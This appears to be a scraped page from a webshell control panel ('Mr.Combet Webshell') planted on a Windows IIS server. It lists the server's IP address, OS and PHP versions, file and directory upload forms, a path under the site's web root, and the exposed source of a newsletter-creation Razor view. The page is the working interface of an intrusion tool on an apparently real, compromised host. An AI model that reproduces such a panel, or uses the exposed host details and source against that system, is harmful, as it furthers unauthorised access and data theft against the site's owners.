Mr.Combet Webshell
Your IP :
216.73.216.136
Server IP :
103.233.58.157
Server :
Windows NT WIN-4PGF72KEHKB 10.0 build 17763 (Windows Server 2016) AMD64
Server Software :
Microsoft-IIS/10.0
PHP Version :
7.3.25
Add File :
Submit
Add Directory :
Submit
Dir :
C:
/
inetpub
/
wwwroot
/
HRDC
/
HRDC
/
Views
/
Dashboard
/
View File Name :
CreateNewsletter.cshtml
@model HRDC.Models.NewsletterViewModel @{ ViewBag.Title = "Create"; Layout = "~/Views/Shared/_AdminLayout.cshtml"; } @using (Html.BeginForm("CreateNewsletter", "Dashboard", FormMethod.Post, new { enctype = "multipart/form-data" })) { @Html.AntiForgeryToken() @Html.ValidationSummary(true, "", new { @class = "text-danger" }) <div class="row"> <div class="col-xs-12"> <div class="panel panel-primary"> <div class="panel-heading"> Create Newsletters </div> <div class="panel-body"> <div class="form-group"> @Html.LabelFor(model => model.NewsletterTitle) @Html.EditorFor(model => model.NewsletterTitle, new { htmlAttributes = new { @class = "form-control" } }) @Html.ValidationMessageFor(model => model.NewsletterTitle, "", new { @class = "text-danger" }) </div> <div class="form-group"> @Html.LabelFor(model => model.NewsletterBody) @Html.TextAreaFor(model => model.NewsletterBody, new { @id = "Content", @class = "form-control", @rows = "200" }) @Html.ValidationMessageFor(model => model.NewsletterBody, "", new { @class = "text-danger" }) </div> <input type="submit" value="Send" class="btn btn-info" onclick="return submitClick()" /> </div> </div> </div> </div> } <div> @Html.ActionLink("Back to List", "Index") </div> <script> CKEDITOR.replace('Content', { enterMode: CKEDITOR.ENTER_BR, }); </script>